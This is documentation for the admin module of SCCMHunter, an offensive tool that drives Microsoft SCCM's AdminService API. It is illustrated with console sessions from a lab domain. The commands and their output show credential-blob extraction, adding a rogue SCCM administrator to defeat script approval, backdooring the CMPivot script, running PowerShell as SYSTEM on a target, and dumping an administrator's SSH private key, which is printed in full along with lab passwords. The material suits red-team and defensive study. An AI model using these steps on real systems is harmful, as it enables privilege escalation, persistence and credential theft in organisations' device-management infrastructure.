Skip to main content

Description

The admin module provides simulated command and control command line access to the SMS Provider’s AdminService API.

Requirements

  • Any (SMS Admins local group)

Usage

└─# python3 sccmhunter.py admin -u administrator -p P@ssw0rd -ip 10.10.100.9 -h

                                                                                          (
                                    888                         d8                         \
 dP"Y  e88'888  e88'888 888 888 8e  888 ee  8888 8888 888 8e   d88    ,e e,  888,8,        )
C88b  d888  '8 d888  '8 888 888 88b 888 88b 8888 8888 888 88b d88888 d88 88b 888 "    ##-------->
 Y88D Y888   , Y888   , 888 888 888 888 888 Y888 888P 888 888  888   888   , 888           )
d,dP   "88,e8'  "88,e8' 888 888 888 888 888  "88 88"  888 888  888    "YeeP" 888          /
                                                                                         (
                                                                 vdev0.0.3                   
                                                                 @garrfoster                    
    
    
    
                                                                                                                                                                                               
 Usage: sccmhunter admin [OPTIONS] COMMAND [ARGS]...                                                                                                                                           
                                                                                                                                                                                               
 Run administrative commands through the AdminService API.                                                                                                                                     
                                                                                                                                                                                               
╭─ Options ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ *          -u          TEXT  Username [default: None] [required]                                                                                                                            │
│ *          -p          TEXT  Password or NTLM hash. (LM:NT) [default: None] [required]                                                                                                      │
│ *          -ip         TEXT  IP address or hostname of site server [default: None] [required]                                                                                               │
│            -debug            Enable Verbose Logging                                                                                                                                         │
│            -au         TEXT  Optional script approval username [default: None]                                                                                                              │
│            -ap         TEXT  Optional script approval password [default: None]                                                                                                              │
│    --help  -h                Show this message and exit.                                                                                                                                    │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

Commands

[19:26:57] INFO     [!] Enter help for extra shell commands                                                                                                                                    
() (C:\) >> help -v

Documented commands (use 'help -v' for verbose/'help <topic>' for details):

Credential Extraction Commands
======================================================================================================
decrypt               Decrypt provided encrypted blob                  decrypt [blob]
decryptEx             Decrypt provided blob with session key           decryptEx [session key] [blob]
get_azurecreds        Extract Azure application cred blobs             get_azurecreds
get_azuretenant       Get Azure Tenant Info                            get_azuretenant
get_creds             Extract encrypted cred blobs                     get_creds
get_forestkey         Extract forest discovery session key blobs       get_forestkey
get_pxepassword       Extract pxeboot encrypted cred blobs             get_pxepassword

Database Commands
=======================================================================================================
get_collection         Query for all (*) or single (id) collection(s)
get_collectionmembers  Query for all members of a colection. Warning: could be heavy
get_device             Query specific device information
get_lastlogon          Query for devices the target recently signed in
get_puser              Query for devices the target is a primary user
get_user               Query specific user information

Interface Commands
======================================================================================================
exit                  Exit the console.
interact              Target Device/Collection to Query         interact (device code)

PostEx Commands
=========================================================================================================
add_admin                Add SCCM Admin                           add_admin (user) (sid)
backdoor                 Backdoor CMPivot Script                  backdoor (/path/to/script)
backup                   Backup original CMPivot Script
delete_admin             Remove SCCM Admin                        delete_admin (user)
delete_script            Delete a script from the SCCM server.    delete_script (GUID)
list_scripts             List scripts.
restore                  Restore original CMPivot Script
script                   Run script on target                     script (/path/to/script)
show_admins              List admin users                         show_admins
show_consoleconnections  List console sessions and source         show_consoleconnections
show_rbac                List users and their roles               show_rbac

Situational Awareness Commands
======================================================================================================
administrators        Query local administrators on target
cat                   Read file contents.                      cat (filename)
cd                    Change current working directory.
console_users         Show total time any users has logged on to the target.
disk                  Show disk information on the target.
environment           Show configured environment variables on target.
ipconfig              Run ipconfig on target
list_disk             Show drives mounted to the target system.
ls                    List files in current working directory.
osinfo                Show OS info of target system.
ps                    List running processes on target.
services              List running services on target.
sessionhunter
sessions              Show users with an active session on the target system.
shares                List file shares hosted on target.
software              Show installed software on the target system. 

get_collection

Description

The get_collection module can pull data regarding a single collection or recover all configured collections from the site server. Each query is demonstrated in the example below.

Usage

get_collection Query for all (*) or single (id) collection(s)

Example

() (C:\) >> get_collection *
[19:56:18] INFO     [-] * collection(s) not found. Pulling collections from the API                                                                                                                                                    
[19:56:18] INFO     [*] Collecting collections...                                                                                                                                                                                      
[19:56:20] INFO     +----------------+---------------+--------------------------------+                                                                                                                                                
                    | CollectionID   |   MemberCount | Name                           |                                                                                                                                                
                    +================+===============+================================+                                                                                                                                                
                    | SMS00001       |            20 | All Systems                    |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMS00002       |             4 | All Users                      |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMS00003       |             0 | All User Groups                |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMS00004       |             4 | All Users and User Groups      |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMSOTHER       |             0 | All Custom Resources           |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMS000US       |             2 | All Unknown Computers          |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMS000PS       |             1 | All Provisioning Devices       |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMS000KM       |             0 | Co-management Eligible Devices |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMSDM001       |             0 | All Mobile Devices             |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
                    | SMSDM003       |            16 | All Desktop and Server Clients |                                                                                                                                                
                    +----------------+---------------+--------------------------------+                                                                                                                                                
() (C:\) >> get_collection SMS00001
[19:56:27] INFO     --------------------------------------                                                                                                                                                                             
                        CollectionID: SMS00001                                                                                                                                                                                         
                        CollectionType: 2                                                                                                                                                                                              
                        IsBuiltIn: True                                                                                                                                                                                                
                        LimitToCollectionName: None                                                                                                                                                                                    
                        MemberClassName: SMS_CM_RES_COLL_SMS00001                                                                                                                                                                      
                        MemberCount: 20                                                                                                                                                                                                
                        Name: All Systems                                                                                                                                                                                              
                        ------------------------------------------                                                                                                                                                                     
() (C:\) >> 

get_device

Description

The get_device command will query the site server for a provided hostname. If the request is the first time the host has been queried, the data is pulled from the API. Otherwise, the results are stored in a local database to avoid unnecessary queries.

Usage

get_device [hostname]

Example

() (C:\) >> get_device mp
[19:55:52] INFO     [*] Collecting device...                                                                                                                                                                                           
[19:55:53] INFO     [+] Device found.                                                                                                                                                                                                  
[19:55:53] INFO     ------------------------------------------                                                                                                                                                                         
                    Active: 1                                                                                                                                                                                                          
                    Client: 1                                                                                                                                                                                                          
                    DistinguishedName: CN=MP,OU=SCCM_SiteSystems,DC=internal,DC=lab                                                                                                                                                    
                    FullDomainName: INTERNAL.LAB                                                                                                                                                                                       
                    IPAddresses: 10.10.100.13                                                                                                                                                                                          
                    LastLogonUserDomain: None                                                                                                                                                                                          
                    LastLogonUserName: None                                                                                                                                                                                            
                    Name: MP                                                                                                                                                                                                           
                    OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0                                                                                                                                                    
                    PrimaryGroupID: 515                                                                                                                                                                                                
                    ResourceId: 16777219                                                                                                                                                                                               
                    ResourceNames: mp.internal.lab                                                                                                                                                                                     
                    SID: S-1-5-21-4004054868-2969153893-1580793631-1106                                                                                                                                                                
                    SMSInstalledSites: LAB                                                                                                                                                                                             
                    SMSUniqueIdentifier: GUID:D78C19DA-D4ED-474F-88D4-1566B96F2732                                                                                                                                                     
                    ------------------------------------------                                                                                                                                                                         
() (C:\) >> 

get_lastlogon

Description

The get_lastlogon command will query the site for every client the provided user account was the last logged on user.

Usage

get_lastlogon [name]

Example

() (C:\) >> get_lastlogon administrator
[19:57:23] INFO     [*] Collecting devices...                                                                                                                                                                                          
[19:57:25] INFO     +------------------+-----------------------+---------------------+----------+--------------+-----------------------+                                                                                               
                    | FullDomainName   | LastLogonUserDomain   | LastLogonUserName   | Name     |   ResourceId | ResourceNames         |                                                                                               
                    +==================+=======================+=====================+==========+==============+=======================+                                                                                               
                    | INTERNAL.LAB     | LAB                   | administrator       | DP       |     16777221 | dp.internal.lab       |                                                                                               
                    +------------------+-----------------------+---------------------+----------+--------------+-----------------------+                                                                                               
                    | INTERNAL.LAB     | LAB                   | administrator       | PC01     |     16777222 | pc01.internal.lab     |                                                                                               
                    +------------------+-----------------------+---------------------+----------+--------------+-----------------------+                                                                                               
                    | INTERNAL.LAB     | LAB                   | administrator       | CA       |     16777223 | ca.internal.lab       |                                                                                               
                    +------------------+-----------------------+---------------------+----------+--------------+-----------------------+                                                                                               
                    | INTERNAL.LAB     | LAB                   | administrator       | PROVIDER |     16777224 | provider.internal.lab |                                                                                               
                    +------------------+-----------------------+---------------------+----------+--------------+-----------------------+                                                                                               
                    | INTERNAL.LAB     | LAB                   | administrator       | WSUS     |     16777226 | wsus.internal.lab     |                                                                                               
                    +------------------+-----------------------+---------------------+----------+--------------+-----------------------+                                                                                               
() (C:\) >> 

get_puser

Description

Query SCCM for any enrolled client where the supplied user account is configured as the primary user.

Usage

get_puser [username]

Example

() (C:\) >> get_puser lowpriv
[19:58:20] INFO     [-] Primary user data for lowpriv not found. Pulling from the API.                                                                                                                                                 
[19:58:20] INFO     [*] Collecting primary users...                                                                                                                                                                                    
[19:58:21] INFO     +------------+--------------------------+--------------+----------------+------------------+                                                                                                                       
                    | IsActive   |   RelationshipResourceID |   ResourceID | ResourceName   | UniqueUserName   |                                                                                                                       
                    +============+==========================+==============+================+==================+                                                                                                                       
                    | True       |                 25165830 |     16777250 | DEV            | lab\lowpriv      |                                                                                                                       
                    +------------+--------------------------+--------------+----------------+------------------+                                                                                                                       
() (C:\) >> 

get_user

Description

Query SCCM for details for a provided username. If the request is the first time the user has been queried, the data is pulled from the API. Otherwise, the results are stored in a local database to avoid unnecessary queries.

Usage

get_user [username]

Example

() (C:\) >> get_user lowpriv
[19:59:01] INFO     [*] Collecting users...                                                                                                                                                                                            
[19:59:02] INFO     [+] User found.                                                                                                                                                                                                    
[19:59:02] INFO     ------------------------------------------                                                                                                                                                                         
                    DistinguishedName: CN=lowpriv,CN=Users,DC=internal,DC=lab                                                                                                                                                          
                    FullDomainName: INTERNAL.LAB                                                                                                                                                                                       
                    FullUserName: lowpriv                                                                                                                                                                                              
                    Mail:                                                                                                                                                                                                              
                    NetworkOperatingSystem: Windows NT                                                                                                                                                                                 
                    ResourceId: 2063597570                                                                                                                                                                                             
                    sid: S-1-5-21-4004054868-2969153893-1580793631-1113                                                                                                                                                                
                    UniqueUserName: LAB\lowpriv                                                                                                                                                                                        
                    UserAccountControl: 512                                                                                                                                                                                            
                    UserName: lowpriv                                                                                                                                                                                                  
                    UserPrincipalName: None                                                                                                                                                                                            
                    ------------------------------------------                                                                                                                                                                         
() (C:\) >> 

add_admin

Description

Add a provied account as a site server admin. This is useful for the scripts module where SCCM is configured to require a secondary account for script approval (default setting). The account type is not limited to a traditional user account and can be a machine.

Usage

add_admin [username] [sid]

Example

() (C:\) >> show_admins 
[22:47:42] INFO     Tasked SCCM to list current SMS Admins.                                                                                                                                                                            
[22:47:43] INFO     Current Full Admin Users:                                                                                                                                                                                          
[22:47:43] INFO     LAB\Administrator                                                                                                                                                                                                  
() (C:\) >> add_admin lowpriv S-1-5-21-4004054868-2969153893-1580793631-1113
[22:47:47] INFO     Tasked SCCM to add lowpriv as an administrative user.                                                                                                                                                              
[22:47:49] INFO     [+] Successfully added lowpriv as an admin.                                                                                                                                                                        
() (C:\) >> show_admins 
[22:47:51] INFO     Tasked SCCM to list current SMS Admins.                                                                                                                                                                            
[22:47:52] INFO     Current Full Admin Users:                                                                                                                                                                                          
[22:47:52] INFO     LAB\Administrator                                                                                                                                                                                                  
[22:47:52] INFO     lowpriv                                                                                                                                                                                                            
() (C:\) >> 

backdoor

Description

Replace the built-in CMPivot script stored in the site server database with a user supplied script. This command will not run unless a backup exists for the script to ensure the operator is able to undue/restore the backdoored script. Note: This is still a beta feature and not recommended to be used in production.

Usage

backdoor [/path/to/script]

Example

(16777221) (C:\Users\) >> backdoor /root/test.txt
[23:34:54] INFO     Tasked SCCM to backdoor CMPivot with provided script                                                                                                                                                               
IMPORTANT: Did you backup the script first? There is no going back without it. Y/N?Y
[23:34:59] INFO     [+] CMPivot script updated successfully.                                                                                                                                                                           
[23:35:01] INFO     [+] CMPivot script approved.   

backup

Description

Performs a back up of the existing built-in CMPivot script. Required prior to any manipulation of the CMPivot script. Note: This is still a beta feature and not recommended to be used in production.

Usage

Example

(16777221) (C:\Users\) >> shell ls -l /root/.sccmhunter/logs/
total 232
-rw-r--r-- 1 root root 214176 Feb  7 23:35 console.log
drwxr-xr-x 2 root root   4096 Feb  6 22:02 csvs
drwxr-xr-x 2 root root   4096 Feb  7 19:59 db
drwxr-xr-x 2 root root   4096 Feb  6 22:02 json
drwxr-xr-x 2 root root   4096 Feb  6 22:02 loot
(16777221) (C:\Users\) >> backup
[23:38:11] INFO     Tasked SCCM to backup the CMPivot script.                                                                                                                                                                          
[23:38:14] INFO     [+] Backup created successfully.                                                                                                                                                                                   
(16777221) (C:\Users\) >> shell ls -l /root/.sccmhunter/logs/
total 280
-rw-r--r-- 1 root root  48651 Feb  7 23:38 cmpivot_backup.ps1
-rw-r--r-- 1 root root 214176 Feb  7 23:35 console.log
drwxr-xr-x 2 root root   4096 Feb  6 22:02 csvs
drwxr-xr-x 2 root root   4096 Feb  7 19:59 db
drwxr-xr-x 2 root root   4096 Feb  6 22:02 json
drwxr-xr-x 2 root root   4096 Feb  6 22:02 loot

delete_admin

Description

Remove a target administrator account from SCCM. Note: cannot be performed against itself.

Usage

Example

restore

Description

Restore a modified CMPivot script to its previous state. Note: This is still a beta feature and not recommended to be used in production.

Usage

Example

(16777221) (C:\Users\) >> restore 
[23:35:05] INFO     Tasked SCCM to restore the original CMPivot script.                                                                                                                                                                
[23:35:06] INFO     [+] CMPivot script updated successfully.                                                                                                                                                                           
[23:35:07] INFO     [+] CMPivot script approved. 

script

Description

Execute a provided PowerShell script on a target host. The script is intended to be self deleting from the remote host as well as from the site database. If the hierarchy is configured to require script approval (default) alternate credentials must be specified to approve the script. Alternate credentials can be obtained by using the add_admin command to add a secondary account as an administrator.

Usage

script [/path/to/script]

Examples

Script approval not required

Script approval required

Script execution fails
(16777221) (C:\) >> script /root/test.txt
[22:57:31] INFO     [+] Updates script created successfully with GUID c6006c4a-5590-4cac-9b49-48b86e80064f.                                                                                                                            
[22:57:35] INFO     [-] Hierarchy settings do not allow author's to approve their own scripts. All custom script execution will fail.                                                                                                  
[22:57:35] INFO     [*] Try using alternate approval credentials.                                                                                                                                                                      
[22:57:38] INFO     [+] Script with GUID c6006c4a-5590-4cac-9b49-48b86e80064f deleted.                                                                                                                                                 
(16777221) (C:\) >> 
Exit and provide alternate approval credentials. Run script again.
(16777221) (C:\) >> exit
                                                                                                                                                                                                                                       
┌──(root㉿kali)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u lab\\administrator -p P@ssw0rd -ip 10.10.100.9 -au lowpriv -ap P@ssw0rd -debug
SCCMHunter vdev0.0.3 by @garrfoster
[14:13:07] DEBUG    [*] Database built.                                                                                                                                                            
[14:13:07] INFO     [!] Enter help for extra shell commands                                                                                                                                        
() C:\ >> shell nano /root/test.txt
() (C:\) >> interact 16777221
(16777221) (C:\) >> script /root/test.txt
[14:13:36] INFO     [+] Updates script created successfully with GUID 405cde91-bb42-4d2f-9acd-7b3b3789ccd4.                                                                                        
[14:13:36] DEBUG    [*] Using alternate credentials to approve script.                                                                                                                             
[14:13:38] INFO     [+] Script with guid 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 approved.                                                                                                            
[14:13:40] INFO     [+] Script with guid 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 executed.                                                                                                            
[14:13:40] DEBUG    [+] Got OperationID: 16779568                                                                                                                                                  
[14:13:58] INFO     [+] Got result:                                                                                                                                                                
[14:13:58] INFO     nt authority\\system                                                                                                                                                           
[14:13:59] INFO     [+] Script with GUID 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 deleted.                                                                                                             
(16777221) (C:\) >> 

show_admins

Description

Show the current SCCM admin accounts.

Usage

show_admins

Example

() C:\ >> show_admins
[22:13:53] INFO     Tasked SCCM to list current SMS Admins.                                                                                                                                     
[22:13:53] INFO     Current Full Admin Users:                                                                                                                                                   
[22:13:53] INFO     LAB\Administrator                                                                                                                                                           
() (C:\) >> 

interact

Description

Sets the target device for command line interactions to a specified ResourceID. This setting must be configured prior to any remote enumeration or script execution.

Usage

interact [ResourceID]

Example

In the below example, the dp device is queried. In the result the 16777221 is returned. The operator can now interact with that device and configure the command line.
() (C:\) >> get_device dp
[19:54:23] INFO     ------------------------------------------                                                                                                                                                                         
                    Active: 1                                                                                                                                                                                                          
                    Client: 1                                                                                                                                                                                                          
                    DistinguishedName: CN=DP,OU=SCCM_SiteSystems,DC=internal,DC=lab                                                                                                                                                    
                    FullDomainName: INTERNAL.LAB                                                                                                                                                                                       
                    IPAddresses: 10.10.100.11                                                                                                                                                                                          
                    LastLogonUserDomain: LAB                                                                                                                                                                                           
                    LastLogonUserName: administrator                                                                                                                                                                                   
                    Name: DP                                                                                                                                                                                                           
                    OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0                                                                                                                                                    
                    PrimaryGroupID: 515                                                                                                                                                                                                
                    ResourceId: 16777221                                                                                                                                                                                               
                    ResourceNames: dp.internal.lab                                                                                                                                                                                     
                    SID: S-1-5-21-4004054868-2969153893-1580793631-1105                                                                                                                                                                
                    SMSInstalledSites: LAB                                                                                                                                                                                             
                    SMSUniqueIdentifier: GUID:7484EE6B-8D62-40CE-97A4-079F30EDA5A0                                                                                                                                                     
                    ------------------------------------------                                                                                                                                                                         
() (C:\) >> interact 16777221
(16777221) (C:\) >> 

administrators

Description

Query the interactive device for members of the device’s local administrators group.

Usage

administrators

Example

(16777221) (C:\) >> administrators 
[19:38:17] INFO     Tasked SCCM to run Administrators.                                                                                                                                         
[19:38:19] INFO     Got OperationId 16779666. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:38:29] INFO     No results yet, sleeping 10 seconds.                                                                                                                                       
[19:38:41] INFO     +---------------+----------------------+-------------------+----------+                                                                                                    
                    | ObjectClass   | Name                 | PrincipalSource   | Device   |                                                                                                    
                    +===============+======================+===================+==========+                                                                                                    
                    | User          | DP\Administrator     | Local             | DP       |                                                                                                    
                    +---------------+----------------------+-------------------+----------+                                                                                                    
                    | Group         | LAB\Domain Admins    | ActiveDirectory   | DP       |                                                                                                    
                    +---------------+----------------------+-------------------+----------+                                                                                                    
                    | Group         | LAB\SCCM_SiteServers | ActiveDirectory   | DP       |                                                                                                    
                    +---------------+----------------------+-------------------+----------+  

cat

Description

Display the contents of a file on the interactive device. The command line must be configured with the path to the file contents directory. For example, if the file you want to display is in “C:\Windows\Temp”, you must issue a cd command to configure the command line with that file path in addition to the interactive device. NOTE: SCCM limits the result returned from scripts to 4KB. If the file size is larger it will be truncated or unreliable. Additionally, since scripts are used, you may need to supply alternate credentials. See scripts for more information.

Usage

cat [filename]

Example

(16777221) (C:\) >> cd C:\Users\administrator.LAB\.ssh
(16777221) (C:\Users\administrator.LAB\.ssh\) >> cat id_rsa
[23:21:41] INFO     Tasked SCCM to show id_rsa                                                                                                                                                                                         
[23:21:43] INFO     [+] Updates script created successfully with GUID 22057b18-d704-4734-ac35-2641eae96fb4.                                                                                                                            
[23:21:47] INFO     [+] Script with guid 22057b18-d704-4734-ac35-2641eae96fb4 approved.                                                                                                                                                
[23:21:49] INFO     [+] Script with guid 22057b18-d704-4734-ac35-2641eae96fb4 executed.                                                                                                                                                
[23:22:08] INFO     [+] Got result:                                                                                                                                                                                                    
[23:22:08] INFO     -----BEGIN OPENSSH PRIVATE KEY-----                                                                                                                                                                                
                    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn                                                                                                                                             
                    NhAAAAAwEAAQAAAYEAv0P8SG6b1AfXaWVmslD32pxVgncux1cxgNv6CnnG/OxDvAQdsBiB                                                                                                                                             
                    Pf2D3u8PjEkjH2x9N5te3sc5SK/3umM3RKu0QZ0fa6wbyUigPyq5NyRuNF9ky84A8OOrik                                                                                                                                             
                    0XBUtqt2sdQWRP4OJsN7YK6W2e5SMu0MJfveId6OmReYayVEMt4KSrYpQ62TGqwPOu56r9                                                                                                                                             
                    VSSu8l36fK7+nKzFCq2LeqCHD9/kXlbggRJZZdINgWX3IPpd9mqUKy74HBSXrgIjPaF76I                                                                                                                                             
                    4wuIIkFaMpQ1L5BBOZt/EgI//0PPkcGRlnevK+9G9gFfcQFN59BB0YGMjTNJ0zvtJswY7u                                                                                                                                             
                    gAkRINBoUPZFg0QlHa8a6zDF1v4uUrH0+2G43lLk90fyO4GfCSyGrYV33nfnIR1mYuPjFW                                                                                                                                             
                    xmhOiIV4F/sprTjR0v1YUxWVUfJIC0yG4ZIpWqr2Mh9tiuHgAlknJftecpnEaJlmWZKcvv                                                                                                                                             
                    nbKP+fsqgT2UP7bTAh0kcYE4M+gz1puYJoLyrFvLAAAFkMzZOuvM2TrrAAAAB3NzaC1yc2                                                                                                                                             
                    EAAAGBAL9D/Ehum9QH12llZrJQ99qcVYJ3LsdXMYDb+gp5xvzsQ7wEHbAYgT39g97vD4xJ                                                                                                                                             
                    Ix9sfTebXt7HOUiv97pjN0SrtEGdH2usG8lIoD8quTckbjRfZMvOAPDjq4pNFwVLardrHU                                                                                                                                             
                    FkT+DibDe2CultnuUjLtDCX73iHejpkXmGslRDLeCkq2KUOtkxqsDzrueq/VUkrvJd+nyu                                                                                                                                             
                    /pysxQqti3qghw/f5F5W4IESWWXSDYFl9yD6XfZqlCsu+BwUl64CIz2he+iOMLiCJBWjKU                                                                                                                                             
                    NS+QQTmbfxICP/9Dz5HBkZZ3ryvvRvYBX3EBTefQQdGBjI0zSdM77SbMGO7oAJESDQaFD2                                                                                                                                             
                    RYNEJR2vGuswxdb+LlKx9PthuN5S5PdH8juBnwkshq2Fd9535yEdZmLj4xVsZoToiFeBf7                                                                                                                                             
                    Ka040dL9WFMVlVHySAtMhuGSKVqq9jIfbYrh4AJZJyX7XnKZxGiZZlmSnL752yj/n7KoE9                                                                                                                                             
                    lD+20wIdJHGBODPoM9abmCaC8qxbywAAAAMBAAEAAAGBAIjAiT8Ypp4BRUl8UOMp9Sz/Hj                                                                                                                                             
                    x8DpxEgYaKwcp/q4DnRL7Hipp/ytiRzJm2/7zkBhLPtO/vTPOoKhMIje1cRwX4ZpeLSg3o                                                                                                                                             
                    Lq3KGZlQaME+cPVNR3pYvl99yQbHe7AzbgfatD4vBNXbzlg+9qpT0Iowj6Z/c4kGhTAk3/                                                                                                                                             
                    iuEA8jQUgfNNL0/OaSFm6DTQkjPqKD6fosq44+aJmJBhFOaC2zXR5CjLvPDhH7FqQwfauJ                                                                                                                                             
                    Rhr0J/6p0WrW2Frrdk/aAi/+pZ9UFqt2o4DD+zykEIJOoc6eKNGe+aUyynGM8KXC/P4e1U                                                                                                                                             
                    qogDHufaok0Nhhwp/TliazP80FMwYEib1uKdxinT1k1JaLYDfdptPaYWDBxBgnvFmsAEsH                                                                                                                                             
                    ePz8oc3nNePRR48PhfH/yqeUB8QryDkr6ril2E0UmqF2YU2fj7ZHx2JM3prPKx8vBiNrrG                                                                                                                                             
                    ZyyYcaYESiXbMXZ2/betlp0R3nQ1gTmv/vaqsN1wy8W8OBcQYz33SDq4j/xPkFcZBQoQAA                                                                                                                                             
                    AMAY/+54mljzB4VtLznw8y5A3vxFoQZM4Jb1FWr4fNXPkR0MS8W6o6bIFve/+b/P7se5m4                                                                                                                                             
                    QSrtCbKck8aQj1lb2apYAs9q899iQH4AZzz8x0taubQbpgA7eOkOB59zhom1biUi+WeU/P                                                                                                                                             
                    H7yKWgMY0evTigMSKDNmUoxXE8+Ay4Azm5pj8cL5oUWhVqwX/oJ67pIqpRCBPn7BXWz8i5                                                                                                                                             
                    NGSHaGfknMQhk2oT0+sYJrYDaFqF/YqQBgEbMUgbTI1uTvnKIAAADBAN5ZvoyiNYiNelQF                                                                                                                                             
                    Iv6S7FZIyu/OTGgQui6QxneWAcKEF53s3MP9KkzY9cx4JkWVik8+MC0MEqH8ds4HiYOIQG                                                                                                                                             
                    njJddl1AU43eO+w3whirOkorlPOat/ec1J11iRVUk59rm3Cahm4C/OX//jTbNsZ7EqyClU                                                                                                                                             
                    xqcSLe+k5OkTWllAKr6H1lTiLAidQBkm3sDMObDkiYeyKsPApL81hVPnpYizWSjGhlah7c                                                                                                                                             
                    VraPqUNWtDXOParqUq6kPKOwuoqOIfcwAAAMEA3DX0Bm71bnLqP6BA5b85R4NCcbp7GTdb                                                                                                                                             
                    gz5eBUxyPQ/I2AYrz8aMdvbP7jyRbHnMul+rbwU+NE4v0wG9GbQzxuHbizVWKHKeFWNwsd                                                                                                                                             
                    pkeFf6c77iL6Tv2fTROkFhlroKPNKY0rzPYiCo4UyohnFYmyP4S+Rci8vpsAol53fllpaJ                                                                                                                                             
                    EMw09ZBUefL3uURnY3bTXkfroxCG0nULuVptxffvBQ/Lv9+efnrYIS890gEqm+zMxGu7ae                                                                                                                                             
                    ZLdczteWBuaAxJAAAAFGxhYlxhZG1pbmlzdHJhdG9yQGRwAQIDBAUG                                                                                                                                                             
                    -----END OPENSSH PRIVATE KEY-----                                                                                                                                                                                  
[23:22:12] INFO     [+] Script with GUID 22057b18-d704-4734-ac35-2641eae96fb4 deleted.                                                                                                                                                 
(16777221) (C:\Users\administrator.LAB\.ssh\) >> 

cd

Description

Change directories on the command line. This is required for both the ls and cat commands.

Usage

cd [filepath]

Example

(16777221) (C:\) >> cd C:\Users
(16777221) (C:\Users\) >> ls
[23:25:28] INFO     Tasked SCCM to list files in C:\Users\.                                                                                                                                                                            
[23:25:28] INFO     Got OperationId 16779694. Sleeping 10 seconds to wait for host to call home.                                                                                                                                       
[23:25:41] INFO     +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | FileName                   | Mode   | LastWriteTime       |   Size | Device   |                                                                                                                                  
                    +============================+========+=====================+========+==========+                                                                                                                                  
                    | C:\Users\Administrator     | d----- | 2024-01-27 05:53:07 |      1 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | C:\Users\administrator.LAB | d----- | 2024-02-08 07:21:12 |      1 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | C:\Users\All Users         | d--hsl | 2021-05-08 08:34:03 |      1 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | C:\Users\Default           | d-rh-- | 2024-01-27 21:59:32 |      1 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | C:\Users\Default User      | d--hsl | 2021-05-08 08:34:03 |      1 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | C:\Users\Public            | d-r--- | 2024-01-27 05:53:07 |      1 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
                    | C:\Users\desktop.ini       | -a-hs- | 2021-05-08 08:18:31 |    174 | DP       |                                                                                                                                  
                    +----------------------------+--------+---------------------+--------+----------+                                                                                                                                  
(16777221) (C:\Users\) >> 

console_users

Description

Returns data detailing the users that have logged on

Usage

console_users

Example

(16777221) (C:\) >> console_users 
[19:39:28] INFO     Tasked SCCM to show all users that have signed in.                                                                                                                         
[19:39:31] INFO     Got OperationId 16779667. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:39:41] INFO     +---------------------+-------------------------+-------------------------------+---------------------------+----------+                                                   
                    | LastConsoleUse      |   NumberOfConsoleLogons | SystemConsoleUser             |   TotalUserConsoleMinutes | Device   |                                                   
                    +=====================+=========================+===============================+===========================+==========+                                                   
                    | 2024-01-27 14:08:00 |                       1 | win-3sflnhdib39\administrator |                       495 | DP       |                                                   
                    +---------------------+-------------------------+-------------------------------+---------------------------+----------+                                                   
                    | 2024-01-28 22:42:35 |                       1 | lab\administrator             |                      2435 | DP       |                                                   
                    +---------------------+-------------------------+-------------------------------+---------------------------+----------+ 

disk

Description

List available disk drives and space on the interactive system

Usage

disk

Example

(16777221) (C:\) >> disk
[19:40:23] INFO     Tasked SCCM to show disk information of 16777221.                                                                                                                          
[19:40:24] INFO     Got OperationId 16779668. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:40:35] INFO     +--------+------------------+-------------+-------------+--------------+----------------------+----------+                                                                 
                    | Name   | Description      |        Size |   FreeSpace | Compressed   | VolumeSerialNumber   | Device   |                                                                 
                    +========+==================+=============+=============+==============+======================+==========+                                                                 
                    | C:     | Local Fixed Disk | 53012852736 | 40399273984 | False        | 5E2D550E             | DP       |                                                                 
                    +--------+------------------+-------------+-------------+--------------+----------------------+----------+                                                                 
                    | D:     | CD-ROM Disc      |  5044094976 |           0 | False        | D10C768B             | DP       |                                                                 
                    +--------+------------------+-------------+-------------+--------------+----------------------+----------+

environment

Description

List environment variables from the interactive system

Usage

Example

(16777221) (C:\) >> environment 
[19:40:51] INFO     Tasked SCCM to show Environment variables of 16777221.                                                                                                                     
[19:40:53] INFO     Got OperationId 16779669. Sleeping 10 seconds to wait for host to call home.                                                                                               
[19:41:03] INFO     No results yet, sleeping 10 seconds.                                                                                                                                       
[19:41:14] INFO     +-----------------------------------+-----------------------------------+------------------------+----------+------------------+------------------------------+------------
                    --------------------------------------------------------------------------------------------------------------------------------+----------+                               
                    | Caption                           | Description                       | Name                   | Status   | SystemVariable   | UserName                     |            
                    VariableValue                                                                                                                              | Device   |                    
                    +===================================+===================================+========================+==========+==================+==============================+============
                    ================================================================================================================================+==========+                               
